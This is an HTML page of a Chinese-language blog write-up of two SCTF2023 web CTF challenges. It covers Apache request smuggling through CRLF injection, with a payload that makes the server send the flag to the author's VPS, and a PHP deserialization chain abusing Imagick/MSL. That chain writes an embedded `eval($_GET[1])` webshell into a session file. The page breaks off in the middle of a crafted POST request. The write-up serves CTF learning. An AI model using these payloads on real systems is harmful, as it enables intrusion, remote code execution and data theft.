

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="s4mmy">
  <meta name="keywords" content="">
  
    <meta name="description" content="SCTF2023太难了，一题能卡我一天😭😭😭，对于一些东西的理解还是太浅了。题目做起来都好吃力。 ezcheck1n这题的考点是请求走私 首先是代码 123456789101112&lt;?php$FLAG &#x3D; &quot;flag&amp;#123;fake_flag&amp;#125;&quot;;@file_get_contents(&quot;http:&#x2F;&#x2F;&quot;.$_GET[&amp;#x27;ur">
<meta property="og:type" content="article">
<meta property="og:title" content="SCTF2023">
<meta property="og:url" content="https://sammylingsj.github.io/2023/07/23/SCTF2023/SCTF2023/index.html">
<meta property="og:site_name" content="s4mmy&#39;s blog">
<meta property="og:description" content="SCTF2023太难了，一题能卡我一天😭😭😭，对于一些东西的理解还是太浅了。题目做起来都好吃力。 ezcheck1n这题的考点是请求走私 首先是代码 123456789101112&lt;?php$FLAG &#x3D; &quot;flag&amp;#123;fake_flag&amp;#125;&quot;;@file_get_contents(&quot;http:&#x2F;&#x2F;&quot;.$_GET[&amp;#x27;ur">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sammylingsj.github.io/img/SCTF2023/luo.png">
<meta property="article:published_time" content="2023-07-22T18:18:44.343Z">
<meta property="article:modified_time" content="2023-07-22T18:24:03.638Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://sammylingsj.github.io/img/SCTF2023/luo.png">
  
  
  
  <title>SCTF2023 - s4mmy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"sammylingsj.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>s4mmy&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/SCTF2023/luo.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SCTF2023"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-23 02:18" pubdate>
          2023年7月23日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          21k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          171 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SCTF2023</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="SCTF2023"><a href="#SCTF2023" class="headerlink" title="SCTF2023"></a>SCTF2023</h1><p>太难了，一题能卡我一天😭😭😭，对于一些东西的理解还是太浅了。题目做起来都好吃力。</p>
<h3 id="ezcheck1n"><a href="#ezcheck1n" class="headerlink" title="ezcheck1n"></a>ezcheck1n</h3><p>这题的考点是请求走私</p>
<p>首先是代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$FLAG</span> = <span class="hljs-string">&quot;flag&#123;fake_flag&#125;&quot;</span>;<br>@<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&quot;http://&quot;</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;url&#x27;</span>].<span class="hljs-variable">$FLAG</span>);<br><span class="hljs-comment"># but it&#x27;s not the real flag</span><br><span class="hljs-comment"># beacuse someone say this year is not 2023 !!! like the post?</span><br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-string">&#x27;./2023.php&#x27;</span>);<br><span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;./post.jpeg&#x27;</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;img src=&quot;data:image/jpeg;base64,&#x27;</span> . <span class="hljs-title function_ invoke__">base64_encode</span>(<span class="hljs-variable">$a</span>) . <span class="hljs-string">&#x27;&quot;&gt;&#x27;</span>;<br><span class="hljs-comment"># notice -&gt; time</span><br><span class="hljs-comment"># How should you get to where the flag is, the middleware will not forward requests that are not 2023</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>首先是<code>file_get_contents</code>，这个函数可以把文件读入一个字符串。</p>
<p>它的第一个参数，同时也是必须参数是<code>path</code>这个path可以是本地文件路径也可以是网络地址。<code>file_get_contents</code>函数在设计上把一切的网络资源视作文件，无论本地，或者远程服务器的。然而在大多数PHP教程网站并没有说明这一点，让我以为只能其只能读取本地文件。</p>
<p>也就是说，<strong>我们可以通过其来请求一个网络地址，变抓取返回包。</strong>这是一个很关键的点，可惜我做的时候只是简单的理解为只能读本地文件，导致我看WP的时候都卡了好久😭也无法理解<code>@file_get_contents(&quot;http://&quot;.$_GET[&#39;url&#39;].$FLAG);</code>这一句话的真正含义。</p>
<p>接着下面的代码就是简单地展示了这张图片</p>
<p><img src="/SCTF2023.assets/image-20230707015458177.png" srcset="/img/loading.gif" lazyload alt="image-20230707015458177"></p>
<p>根据图片提示，我们应该是要访问2022文件，但是直接访问不行。提示也给了说中间件会拦截请求，Wappalyzer可以看到该站是apache 2.4.54，直接搜索漏洞可得CVE-2023-25690<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12345">请求走私漏洞</a></p>
<p>简单来说就是apache在处理的时候会将URI后面的一部分解码解析后直接拼接到请求包中再传递给后端服务器。因为控制字符也会直接解析，所以有机会进行CRLF注入，从而进行请求走私。</p>
<p>再看一下题目中的<code>file_get_contents(&quot;http://&quot;.$_GET[&#39;url&#39;].$FLAG)</code>，参数url使GET方式获取值同时在请求的时候会带上FLAG变量，但是在2023.php中的flag是一个fake flag</p>
<p>所以首先构造一个请求包去访问2022.php文件，但是直接访问的话是没有回显的。这里就要利用到<code>@file_get_contents(&quot;http://&quot;.$_GET[&#39;url&#39;].$FLAG);</code>因为在2023.php中的<code>file_get_contents();</code>并无实际作用，所以可以推测在2022.php中也存在着一个<code>file_get_contents()</code>所以在请求走私的时候，给url传值为我们自己的VPS地址，同时在VPS上使用nc开启端口监听，就能捕捉到<code>file_get_contents()</code>的请求包同时得到flag</p>
<blockquote>
<p>CRLF 指的是<strong>回车符</strong>(CR，ASCII 13，\r，%0d) 和<strong>换行符</strong>(LF，ASCII 10，\n，%0a)。</p>
</blockquote>
<p>构造如下payload</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span><span class="hljs-number">115.239</span>.<span class="hljs-number">215.75</span>:<span class="hljs-number">8082</span><span class="hljs-regexp">/2023/</span>%<span class="hljs-number">20</span>HTTP<span class="hljs-regexp">/1.1%0D%0AHOST:127.0.0.1%0D%0A%0D%0AGET%20/</span><span class="hljs-number">2022</span>.php%<span class="hljs-number">3</span>Furl=<span class="hljs-number">1</span>xx.xxx.<span class="hljs-number">5</span>.xxx:<span class="hljs-number">2333</span><br>即<br><span class="hljs-regexp">/2023/</span> HTTP<span class="hljs-regexp">/1.1/</span>r<span class="hljs-regexp">/nHOST:localhost/</span>r<span class="hljs-regexp">/n/</span>r<span class="hljs-regexp">/n GET /</span><span class="hljs-number">2022</span>.php?url=VPS_ADDR:PORT<br></code></pre></td></tr></table></figure>

<p>我一开始构造的时候在最末尾的地方多加了HTTP&#x2F;1.1，导致走私失败。犯了这种低级错误。。还检查了好久才检查出来太傻比了😭😭😭</p>
<p>还有就是直接在web界面的url传参就可以了，我一开始还傻傻的想用BP做，BP做起来反而更麻烦。。。</p>
<p>然后就是使用url编码的时候不要把斜杠也一起编码了，这样会导致404 &#x3D; &#x3D;这个要记住，防止下次遇到相似情况会被坑。</p>
<p><img src="/SCTF2023.assets/image-20230707024905076.png" srcset="/img/loading.gif" lazyload alt="image-20230707024905076"></p>
<h3 id="fumo-backdoor"><a href="#fumo-backdoor" class="headerlink" title="fumo_backdoor"></a>fumo_backdoor</h3><p>这题乍一看只是个很简单的反序列化伪造，但是实际上涉及到反序列化，ImageMagick扩展，msl脚本语言，XXE包伪造。byd看wp的时候直接给我干蒙了，怎么会涉及到这么冷门的东西，这就是web吗😭😭😭</p>
<p>看看源码</p>
<p>首先是前面这两个</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;open_basedir&#x27;</span>, <span class="hljs-keyword">__DIR__</span>.<span class="hljs-string">&quot;:/tmp&quot;</span>);<br><span class="hljs-title function_ invoke__">define</span>(<span class="hljs-string">&quot;FUNC_LIST&quot;</span>, <span class="hljs-title function_ invoke__">get_defined_functions</span>());<br></code></pre></td></tr></table></figure>

<p><code>ini_set</code>是对php.ini里的值进行设置，且只在函数执行时生效，在脚本结束时失效。相当于是对当前文件的一个临时设置。其中<code>open_basedir</code>是php.ini中的一个配置选项，它可将用户访问文件的活动范围限制在指定的区域。所以这行的意思就是把我们的可以活动的目录限制在<code>tmp</code>目录下。当时的我以为只是把当前目录设置为<code>tmp</code>，并不知道有限制用户活动范围的意思。</p>
<p><code>get_defined_functions</code> ： 返回所有已定义函数的数组，包含了所有已定义的函数，包括内置&#x2F;用户定义的函数。</p>
<p>接着是反序列化的主体</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">fumo_backdoor</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$path</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$argv</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$func</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$class</span> = <span class="hljs-literal">null</span>;<br>    <br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__sleep</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">if</span> (<br>            <span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$this</span>-&gt;path) &amp;&amp; <br>            <span class="hljs-title function_ invoke__">preg_match_all</span>(<span class="hljs-string">&#x27;/[flag]/m&#x27;</span>, <span class="hljs-variable">$this</span>-&gt;path) === <span class="hljs-number">0</span><br>        ) &#123;<br>            <span class="hljs-title function_ invoke__">readfile</span>(<span class="hljs-variable">$this</span>-&gt;path);<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-variable">$func</span> = <span class="hljs-variable language_">$this</span>-&gt;func;<br>        <span class="hljs-keyword">if</span> (<br>            <span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$func</span>) &amp;&amp; <br>            <span class="hljs-title function_ invoke__">in_array</span>(<span class="hljs-variable">$func</span>, FUNC_LIST[<span class="hljs-string">&quot;internal&quot;</span>])<br>        ) &#123;<br>            <span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$func</span>);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-variable">$argv</span> = <span class="hljs-variable language_">$this</span>-&gt;argv;<br>            <span class="hljs-variable">$class</span> = <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-class"><span class="hljs-keyword">class</span>;</span><br><span class="hljs-class">            </span><br><span class="hljs-class">            <span class="hljs-title">new</span> $<span class="hljs-title">class</span>($<span class="hljs-title">argv</span>);</span><br><span class="hljs-class">        &#125;</span><br><span class="hljs-class">    &#125;</span><br><span class="hljs-class">&#125;</span><br><span class="hljs-class"></span><br><span class="hljs-class">$<span class="hljs-title">cmd</span> = $<span class="hljs-title">_REQUEST</span>[&#x27;<span class="hljs-title">cmd</span>&#x27;];</span><br><span class="hljs-class">$<span class="hljs-title">data</span> = $<span class="hljs-title">_REQUEST</span>[&#x27;<span class="hljs-title">data</span>&#x27;];</span><br><span class="hljs-class"></span><br><span class="hljs-class"><span class="hljs-title">switch</span> ($<span class="hljs-title">cmd</span>) </span>&#123;<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;unserialze&#x27;</span>:<br>        <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$data</span>);<br>        <span class="hljs-keyword">break</span>;<br>    <br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;rm&#x27;</span>:<br>        <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&quot;rm -rf /tmp 2&gt;/dev/null&quot;</span>);<br>        <span class="hljs-keyword">break</span>;<br>    <br>    <span class="hljs-keyword">default</span>:<br>        <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>        <span class="hljs-keyword">break</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>switch部分的代码提供两个功能，分别是反序列化化和删除当前目录文件。这里提供一个删除功能，我是没太搞清楚这个是为了干什么。经过测试做题前不清楚文件有时候也能正常出flag。应该是临时文件夹经常被写入东西，所以做题前需要清除一下防止干扰。</p>
<p>接着便是反序列化环节了</p>
<p>首先是<code>__weekup</code>可以通过反序列化触发，同时在<code>__weekup</code>函数里面有一个<code>call_user_func()</code>，这个函数会把第一个函数当做回调函数进行调用，其它参数当做回调函数的参数。因为题目中只给了一个参数，所以这里是一个无参调用。需要注意的是，由于if条件限制<code>call_user_func()</code>只能调用PHP的内部方法</p>
<p>接着是<code>__sleep()</code>，这个函数可以<code> readfile()</code>该函数读入一个文件并写入到输出缓冲。简单来说就是读文件并输出。在tmp文件夹下我们能读到的文件除了临时文件就是session文件了。同时，当下环境内唯一存在序列化的地方就是session了，所以要通过控制session进而来控制<code>__sleep()</code>的触发</p>
<p>按照正常流程来是通过phpinfo收集信息</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;fumo_backdoor&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;path&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;argv&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;func&quot;</span>;s:<span class="hljs-number">7</span>:<span class="hljs-string">&quot;phpinfo&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;class&quot;</span>;N;&#125;<br></code></pre></td></tr></table></figure>

<p>这里有一个小坑就是构造无参调用的pop链的时候直接使用函数名即可，不需要括号。</p>
<p>可以看到用了imagick扩展</p>
<p><img src="/SCTF2023.assets/image-20230707211655131.png" srcset="/img/loading.gif" lazyload alt="image-20230707211655131"></p>
<p>这题的其实与CISCN2022决赛的<a target="_blank" rel="noopener" href="https://blog.wm-team.cn/index.php/archives/38/">一题</a>基本一样。</p>
<p>后面的解题步骤如下</p>
<ol>
<li>反序列化ImageMagick 利用msl类型和vid:msl:&#x2F;tmp&#x2F;php* 执行msl脚本</li>
<li>msl 用 mvg格式 把&#x2F;flag 读到&#x2F;tmp&#x2F;b</li>
<li>msl用inline可以base64 和8bim格式 写入一个session文件，用来反序列化</li>
<li>调用session_start，session被反序列化，休眠的时候被序列化触发sleep 读&#x2F;tmp&#x2F;b</li>
</ol>
<p>感觉没做过或者看过原题的话根本做不出来吧。。。太难了</p>
<p>按照github里的那篇文章可以知道</p>
<p><code>imagick</code>类在初始化的时候、可以执行<code>Magick Scripting Language</code>，即MSL脚本。所以可以在临时文件中写入MSL脚本，然后在<code>imagick</code>类初始化的时候执行临时文件，将其内容写入session文件。再触发<code>__sleep</code>包含读取session文件获得我们想要的内容。</p>
<blockquote>
<p>写入文件时须注意以下几点：</p>
<ol>
<li>因为<code>imagick</code>对文件格式解析较严，需要写入的文件必须是其支持的图片格式，如jpg、gif、ico等。如果直接插入<code>session</code>数据，会导致解析图片错误，导致文件无法写入。</li>
<li><code>php</code>对<code>session</code>的格式解析也较为严格。数据尾不可以存在脏数据，否则<code>session</code>解析错误会无法触发<code>__sleep</code>。</li>
</ol>
</blockquote>
<blockquote>
<p>MSL 代表 Magick 脚本语言。 它是一种内置的 ImageMagick 语言，有助于读取图像、执行图像处理任务以及将结果写回文件系统。</p>
</blockquote>
<p>首先是<code>cmd=rm</code>清除一下临时文件</p>
<p>编写反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">fumo_backdoor</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$path</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$argv</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$func</span> = <span class="hljs-literal">null</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$class</span> = <span class="hljs-literal">null</span>;<br>&#125;<br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">fumo_backdoor</span>();<br><span class="hljs-variable">$a</span>-&gt;<span class="hljs-class"><span class="hljs-keyword">class</span>=&quot;<span class="hljs-title">imagick</span>&quot;;</span><br><span class="hljs-class">$<span class="hljs-title">a</span>-&gt;<span class="hljs-title">argv</span>=&quot;<span class="hljs-title">vid</span>:<span class="hljs-title">msl</span>:/<span class="hljs-title">tmp</span>/<span class="hljs-title">php</span>*&quot;;</span><br><span class="hljs-class"><span class="hljs-title">echo</span> <span class="hljs-title">serialize</span>($<span class="hljs-title">a</span>);</span><br></code></pre></td></tr></table></figure>

<p><code>vid:msl:/tmp/php*</code>中的<code>vid</code>指的是使用vid方案，这种方案可以用于解析掩码（即可以用*来匹配）通过使用 vid: 方案，我们可以将临时文件包含在 MSL 内容中，而无需知道其名称.</p>
<p><code>msl</code>则是指使用MSL对文件进行解析，同时MSL脚本使用XML文档进行编写与传输。</p>
<p>接下来是XML文档的编写</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span> ?&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">image</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;inline:data://image/x-portable-anymap;base64,</span></span><br><span class="hljs-string"><span class="hljs-tag">UDYKOSA5CjI1NQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span><br><span class="hljs-string"><span class="hljs-tag">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span><br><span class="hljs-string"><span class="hljs-tag">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw/cGhwIGV2YWwoJF9HRVRb</span></span><br><span class="hljs-string"><span class="hljs-tag">MV0pOz8+fE86MTM6ImZ1bW9fYmFja2Rvb3IiOjQ6e3M6NDoicGF0aCI7czo4OiIvdG1wL3NzcyI7</span></span><br><span class="hljs-string"><span class="hljs-tag">czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30K&quot;</span> /&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;/tmp/sess_se&quot;</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>其中base64的内容是ppm格式的图片，并在结尾插入了脏数据。</p>
<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230217404.png" srcset="/img/loading.gif" lazyload alt="image-20230708005741597"></p>
<p>构造请求包</p>
<figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs xquery">POST /?data=O:<span class="hljs-number">13</span>:<span class="hljs-meta">%22fumo_backdoor</span><span class="hljs-meta">%22:4:</span><span class="hljs-meta">%7Bs:4:</span><span class="hljs-meta">%22path</span><span class="hljs-meta">%22</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-meta">%22argv</span><span class="hljs-meta">%22</span>;s:<span class="hljs-number">17</span>:<span class="hljs-meta">%22vid:msl:</span>/tmp/php*<span class="hljs-meta">%22</span>;s:<span class="hljs-number">4</span>:<span class="hljs-meta">%22func</span><span class="hljs-meta">%22</span>;N;s:<span class="hljs-number">5</span>:<span class="hljs-meta">%22class</span><span class="hljs-meta">%22</span>;s:<span class="hljs-number">7</span>:<span class="hljs-meta">%22imagick</span><span class="hljs-meta">%22</span>;<span class="hljs-meta">%7D</span>&amp;cmd=unserialze HTTP/<span class="hljs-number">1.1</span><br>HOST: <span class="hljs-number">182.92</span>.<span class="hljs-number">6.230</span>:<span class="hljs-number">18080</span><br>Accept:*/*<br>Content-Type: multipart/form-data;boundary=------------------------c32aaddf3d8fd979<br><br>--------------------------c32aaddf3d8fd979<br>Content-Disposition: form-data;<span class="hljs-built_in"> name</span>=<span class="hljs-string">&quot;swarm&quot;</span>; filename=<span class="hljs-string">&quot;swarm.msl&quot;</span><br>Content-Type: application/octet-stream<br><br>&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span> ?&gt;<br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">image</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;inline:data://image/x-portable-anymap;base64,</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span 